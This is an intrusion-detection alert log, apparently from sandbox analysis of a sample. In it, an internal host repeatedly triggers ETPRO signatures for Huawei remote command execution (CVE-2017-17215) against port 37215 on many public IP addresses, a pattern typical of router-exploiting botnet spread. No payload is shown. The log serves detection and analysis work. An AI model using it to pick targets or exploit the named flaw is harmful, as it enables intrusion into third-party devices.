                                            06/14/24-10:43:36.704557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105237215192.168.2.1441.203.157.254
                                            06/14/24-10:44:26.998088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419437215192.168.2.14197.214.67.200
                                            06/14/24-10:43:52.149059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5467237215192.168.2.14156.34.165.235
                                            06/14/24-10:44:22.881088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3395637215192.168.2.14197.227.252.180
                                            06/14/24-10:43:39.788680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566637215192.168.2.14197.83.179.79
                                            06/14/24-10:43:43.970924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032037215192.168.2.1441.200.226.238
                                            06/14/24-10:44:12.625474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129637215192.168.2.14197.113.160.52
                                            06/14/24-10:44:00.325015TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890837215192.168.2.14156.110.22.220
                                            06/14/24-10:44:24.916049TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504637215192.168.2.14197.43.248.19
                                            06/14/24-10:44:22.881746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112837215192.168.2.14156.18.56.106
                                            06/14/24-10:44:22.880805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331037215192.168.2.14156.181.42.3
                                            06/14/24-10:43:39.808260TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068637215192.168.2.1441.232.182.83
                                            06/14/24-10:43:48.015859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5709437215192.168.2.1441.74.193.205
                                            06/14/24-10:43:58.276179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133637215192.168.2.14197.85.78.65
                                            06/14/24-10:43:56.230353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3694437215192.168.2.1441.142.10.228
                                            06/14/24-10:43:34.676115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5448037215192.168.2.14156.122.69.214
                                            06/14/24-10:43:37.760243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4900037215192.168.2.14197.204.141.63
                                            06/14/24-10:44:12.640989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065637215192.168.2.14197.198.174.87
                                            06/14/24-10:44:31.054344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788637215192.168.2.14156.156.20.215
                                            06/14/24-10:43:34.677130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946637215192.168.2.14197.233.30.78
                                            06/14/24-10:43:41.909302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5163837215192.168.2.1441.95.238.20
                                            06/14/24-10:43:41.848630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3963437215192.168.2.14156.59.32.240
                                            06/14/24-10:43:45.968480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737037215192.168.2.14156.187.63.164
                                            06/14/24-10:44:16.718592TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082437215192.168.2.14197.243.168.82
                                            06/14/24-10:44:14.669623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650437215192.168.2.1441.108.82.247
                                            06/14/24-10:43:41.907137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458037215192.168.2.14156.76.202.75
                                            06/14/24-10:44:22.877613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559037215192.168.2.14156.39.168.236
                                            06/14/24-10:44:35.181087TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915837215192.168.2.14197.249.91.139
                                            06/14/24-10:44:26.978725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077637215192.168.2.14156.155.240.183
                                            06/14/24-10:43:36.729152TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416437215192.168.2.14197.229.250.17
                                            06/14/24-10:44:02.365982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3927637215192.168.2.14197.182.158.150
                                            06/14/24-10:43:36.705099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4208237215192.168.2.14197.12.153.202
                                            06/14/24-10:43:34.679444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978837215192.168.2.14156.242.101.133
                                            06/14/24-10:44:08.503406TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576037215192.168.2.1441.141.128.160
                                            06/14/24-10:43:56.230646TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5968837215192.168.2.14197.104.25.5
                                            06/14/24-10:44:33.134787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4379237215192.168.2.14197.116.173.66
                                            06/14/24-10:43:52.150187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5584637215192.168.2.14197.91.203.241
                                            06/14/24-10:44:24.934237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669837215192.168.2.14197.113.141.205
                                            06/14/24-10:43:45.968236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4938237215192.168.2.14156.1.138.14
                                            06/14/24-10:43:52.149592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016037215192.168.2.14156.15.218.187
                                            06/14/24-10:44:27.001039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4228637215192.168.2.1441.91.105.80
                                            06/14/24-10:43:56.253434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5376437215192.168.2.14156.86.39.145
                                            06/14/24-10:44:24.914840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5468237215192.168.2.1441.192.133.9
                                            06/14/24-10:44:06.470962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4834237215192.168.2.1441.58.96.139
                                            06/14/24-10:44:06.471719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004437215192.168.2.14156.245.108.156
                                            06/14/24-10:44:14.669715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5114237215192.168.2.14156.77.199.207
                                            06/14/24-10:44:04.410258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3318437215192.168.2.14156.223.167.97
                                            06/14/24-10:44:02.382589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132637215192.168.2.1441.211.54.81
                                            06/14/24-10:44:24.932638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4447837215192.168.2.14197.127.82.206
                                            06/14/24-10:44:35.182051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427837215192.168.2.1441.174.68.209
                                            06/14/24-10:44:04.408232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3949637215192.168.2.14156.123.132.2
                                            06/14/24-10:43:34.663829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297837215192.168.2.14156.59.140.170
                                            06/14/24-10:44:10.545331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674437215192.168.2.14197.124.64.5
                                            06/14/24-10:43:43.944576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494637215192.168.2.1441.21.199.194
                                            06/14/24-10:43:45.987936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4932837215192.168.2.14156.103.141.216
                                            06/14/24-10:44:12.616668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3720237215192.168.2.14156.86.37.141
                                            06/14/24-10:44:31.086165TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5758437215192.168.2.14156.118.197.140
                                            06/14/24-10:43:36.725440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874037215192.168.2.14197.4.143.203
                                            06/14/24-10:43:36.728696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3472037215192.168.2.14156.107.131.247
                                            06/14/24-10:44:08.505337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3920637215192.168.2.14197.62.21.185
                                            06/14/24-10:44:10.563067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5685837215192.168.2.14156.180.78.3
                                            06/14/24-10:44:33.134741TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3836437215192.168.2.1441.203.113.141
                                            06/14/24-10:43:34.678555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4236837215192.168.2.14156.49.114.156
                                            06/14/24-10:44:24.942153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3367237215192.168.2.14156.92.222.79
                                            06/14/24-10:44:33.135172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662637215192.168.2.14197.248.63.183
                                            06/14/24-10:44:24.917090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374837215192.168.2.1441.60.239.147
                                            06/14/24-10:43:39.792602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683237215192.168.2.14197.67.192.248
                                            06/14/24-10:43:56.243753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439237215192.168.2.14197.108.76.131
                                            06/14/24-10:44:10.544925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4647037215192.168.2.14156.20.224.255
                                            06/14/24-10:43:34.678262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3653437215192.168.2.1441.211.18.138
                                            06/14/24-10:43:34.662967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4258437215192.168.2.14156.45.119.80
                                            06/14/24-10:43:52.165088TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400437215192.168.2.1441.57.102.240
                                            06/14/24-10:44:29.027300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4192437215192.168.2.1441.93.11.137
                                            06/14/24-10:44:26.977647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3285837215192.168.2.14197.146.46.40
                                            06/14/24-10:43:43.944770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905237215192.168.2.14197.246.41.219
                                            06/14/24-10:43:56.243525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3372837215192.168.2.14197.131.245.239
                                            06/14/24-10:43:56.230936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182237215192.168.2.14197.149.189.235
                                            06/14/24-10:43:39.811844TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117637215192.168.2.14197.193.123.89
                                            06/14/24-10:43:45.991970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720837215192.168.2.1441.12.183.117
                                            06/14/24-10:44:12.615072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185237215192.168.2.1441.41.225.166
                                            06/14/24-10:43:36.729210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503437215192.168.2.14197.91.127.203
                                            06/14/24-10:44:31.082253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5163437215192.168.2.14197.186.243.120
                                            06/14/24-10:43:43.944385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3675237215192.168.2.1441.102.11.71
                                            06/14/24-10:44:14.685105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035437215192.168.2.1441.106.126.191
                                            06/14/24-10:44:16.734221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799237215192.168.2.14156.42.229.58
                                            06/14/24-10:43:39.793027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3433437215192.168.2.14156.220.120.7
                                            06/14/24-10:44:00.341269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666037215192.168.2.14197.135.240.168
                                            06/14/24-10:44:22.859504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5193837215192.168.2.1441.200.226.96
                                            06/14/24-10:44:29.012340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726437215192.168.2.14156.189.137.187
                                            06/14/24-10:43:45.967537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353237215192.168.2.14156.181.220.191
                                            06/14/24-10:43:41.849921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5639037215192.168.2.14156.82.174.117
                                            06/14/24-10:43:54.182139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5542637215192.168.2.14197.205.147.45
                                            06/14/24-10:43:54.184079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969237215192.168.2.1441.91.45.114
                                            06/14/24-10:44:16.718700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854837215192.168.2.14156.151.101.143
                                            06/14/24-10:43:39.811308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5418037215192.168.2.14156.0.158.24
                                            06/14/24-10:43:45.992211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470237215192.168.2.1441.236.220.53
                                            06/14/24-10:43:48.016438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316437215192.168.2.1441.67.106.214
                                            06/14/24-10:43:48.016877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4518237215192.168.2.1441.218.228.87
                                            06/14/24-10:43:36.725850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4583637215192.168.2.14156.11.178.136
                                            06/14/24-10:43:36.718293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183237215192.168.2.14156.183.202.248
                                            06/14/24-10:44:20.831145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4120237215192.168.2.1441.3.89.34
                                            06/14/24-10:43:45.966452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590237215192.168.2.1441.148.62.46
                                            06/14/24-10:44:12.614192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870037215192.168.2.1441.100.67.194
                                            06/14/24-10:44:12.624842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176637215192.168.2.1441.77.89.215
                                            06/14/24-10:43:50.111452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933437215192.168.2.1441.102.16.186
                                            06/14/24-10:44:29.013223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3581237215192.168.2.1441.61.130.166
                                            06/14/24-10:44:33.152691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5466837215192.168.2.14197.233.211.110
                                            06/14/24-10:43:48.034769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109037215192.168.2.1441.132.102.146
                                            06/14/24-10:43:41.848956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3425837215192.168.2.14156.218.2.40
                                            06/14/24-10:43:58.277039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5095037215192.168.2.1441.181.65.17
                                            06/14/24-10:43:43.941273TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684837215192.168.2.1441.51.39.86
                                            06/14/24-10:44:12.618364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868837215192.168.2.1441.42.70.162
                                            06/14/24-10:43:58.276974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316437215192.168.2.14156.171.239.199
                                            06/14/24-10:44:00.323919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150237215192.168.2.14156.171.180.86
                                            06/14/24-10:44:22.862097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3560037215192.168.2.1441.66.182.230
                                            06/14/24-10:43:34.662916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5697037215192.168.2.14156.17.229.84
                                            06/14/24-10:44:35.182784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5879237215192.168.2.14197.83.244.78
                                            06/14/24-10:43:45.969477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3391037215192.168.2.14197.152.232.19
                                            06/14/24-10:44:00.323626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5795637215192.168.2.1441.233.45.125
                                            06/14/24-10:44:02.381445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.1441.214.61.98
                                            06/14/24-10:43:43.942282TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3695237215192.168.2.14197.106.166.42
                                            06/14/24-10:44:10.568259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986237215192.168.2.14156.79.199.248
                                            06/14/24-10:44:31.053426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4399837215192.168.2.14197.164.248.30
                                            06/14/24-10:44:35.183222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347637215192.168.2.14197.19.191.229
                                            06/14/24-10:44:35.177716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590837215192.168.2.14156.227.131.218
                                            06/14/24-10:44:31.050718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812837215192.168.2.14197.82.68.137
                                            06/14/24-10:44:29.024310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4573837215192.168.2.14197.79.138.181
                                            06/14/24-10:44:22.858603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3480837215192.168.2.14156.63.181.114
                                            06/14/24-10:43:58.293565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351237215192.168.2.14156.89.133.36
                                            06/14/24-10:44:06.453478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5734637215192.168.2.1441.18.54.89
                                            06/14/24-10:44:18.762963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715237215192.168.2.1441.129.13.2
                                            06/14/24-10:43:34.676922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958637215192.168.2.14156.107.88.231
                                            06/14/24-10:44:29.025819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3291637215192.168.2.14156.190.46.229
                                            06/14/24-10:44:29.013347TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3531437215192.168.2.14197.2.145.21
                                            06/14/24-10:43:45.968813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4102237215192.168.2.14156.108.65.199
                                            06/14/24-10:43:39.789234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5437637215192.168.2.1441.221.237.136
                                            06/14/24-10:44:29.012248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3400237215192.168.2.1441.193.160.102
                                            06/14/24-10:44:31.087167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5918637215192.168.2.14197.5.180.155
                                            06/14/24-10:43:45.988782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5753237215192.168.2.14156.219.119.81
                                            06/14/24-10:43:50.072247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207037215192.168.2.1441.82.220.213
                                            06/14/24-10:43:36.700733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328037215192.168.2.14197.194.242.40
                                            06/14/24-10:44:22.862065TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784837215192.168.2.14197.196.189.244
                                            06/14/24-10:44:29.014924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758037215192.168.2.1441.231.199.237
                                            06/14/24-10:43:48.030486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4692037215192.168.2.1441.231.9.121
                                            06/14/24-10:43:50.074789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080237215192.168.2.14156.162.146.101
                                            06/14/24-10:44:26.979100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4699037215192.168.2.14197.84.147.17
                                            06/14/24-10:43:34.663406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959037215192.168.2.14197.193.225.65
                                            06/14/24-10:43:41.910548TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964837215192.168.2.14156.107.78.164
                                            06/14/24-10:43:48.019884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850837215192.168.2.14156.178.105.198
                                            06/14/24-10:43:34.661783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4673037215192.168.2.14156.44.219.206
                                            06/14/24-10:44:31.081603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3514237215192.168.2.14156.105.159.197
                                            06/14/24-10:44:16.733009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216837215192.168.2.14156.183.145.118
                                            06/14/24-10:43:37.761099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420837215192.168.2.14156.238.63.246
                                            06/14/24-10:43:48.018645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5857637215192.168.2.14156.16.63.38
                                            06/14/24-10:44:04.407834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386637215192.168.2.14197.236.59.175
                                            06/14/24-10:44:24.932507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5921237215192.168.2.14197.18.220.115
                                            06/14/24-10:43:39.789623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892237215192.168.2.1441.14.47.226
                                            06/14/24-10:44:33.150302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838037215192.168.2.14156.129.240.50
                                            06/14/24-10:44:35.181169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566837215192.168.2.1441.62.22.139
                                            06/14/24-10:44:22.880103TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816237215192.168.2.14197.151.117.71
                                            06/14/24-10:44:31.055594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4624837215192.168.2.14156.153.183.52
                                            06/14/24-10:44:14.671384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575437215192.168.2.1441.252.221.112
                                            06/14/24-10:44:18.776907TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727637215192.168.2.1441.64.243.4
                                            06/14/24-10:44:08.517881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5466437215192.168.2.1441.71.237.123
                                            06/14/24-10:44:33.151723TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5385237215192.168.2.1441.146.230.20
                                            06/14/24-10:43:41.845520TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4652237215192.168.2.14197.69.99.166
                                            06/14/24-10:44:14.683065TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4658437215192.168.2.1441.228.236.142
                                            06/14/24-10:44:18.762202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981237215192.168.2.1441.132.173.213
                                            06/14/24-10:43:36.704166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4319837215192.168.2.1441.146.47.30
                                            06/14/24-10:44:16.733288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4939837215192.168.2.14156.158.15.160
                                            06/14/24-10:43:45.968979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697637215192.168.2.14156.43.188.154
                                            06/14/24-10:43:56.250588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084437215192.168.2.14156.58.63.126
                                            06/14/24-10:43:41.847418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894837215192.168.2.14197.101.193.39
                                            06/14/24-10:43:56.244007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3692637215192.168.2.1441.184.147.252
                                            06/14/24-10:44:08.520498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660637215192.168.2.14197.145.98.151
                                            06/14/24-10:44:16.737507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4144037215192.168.2.14156.32.202.28
                                            06/14/24-10:44:18.775420TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216837215192.168.2.14197.137.28.149
                                            06/14/24-10:43:37.760566TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756837215192.168.2.14197.134.25.235
                                            06/14/24-10:44:24.916737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4348037215192.168.2.14156.118.166.135
                                            06/14/24-10:43:34.675302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5462237215192.168.2.14156.155.120.11
                                            06/14/24-10:43:56.246359TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415237215192.168.2.1441.4.246.85
                                            06/14/24-10:43:41.846132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723237215192.168.2.14197.84.144.33
                                            06/14/24-10:43:36.717586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4062237215192.168.2.14156.208.48.118
                                            06/14/24-10:43:34.661205TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4626437215192.168.2.1441.38.84.36
                                            06/14/24-10:43:41.849353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3484837215192.168.2.14197.163.86.33
                                            06/14/24-10:44:24.943000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6025637215192.168.2.1441.223.14.231
                                            06/14/24-10:43:58.274609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819837215192.168.2.14197.124.39.122
                                            06/14/24-10:43:56.226173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4556237215192.168.2.1441.19.9.31
                                            06/14/24-10:43:56.250661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558037215192.168.2.1441.234.218.108
